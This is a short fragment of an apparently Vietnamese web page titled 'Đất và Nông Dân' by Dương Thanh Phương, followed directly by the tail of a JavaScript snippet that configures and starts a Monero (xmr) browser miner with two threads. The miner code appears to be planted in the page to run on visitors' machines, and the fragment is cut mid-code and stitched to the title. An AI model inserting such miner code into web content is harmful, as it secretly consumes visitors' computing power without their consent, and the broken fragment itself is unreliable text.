Đất và Nông Dân - Dương Thanh Phương -

', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();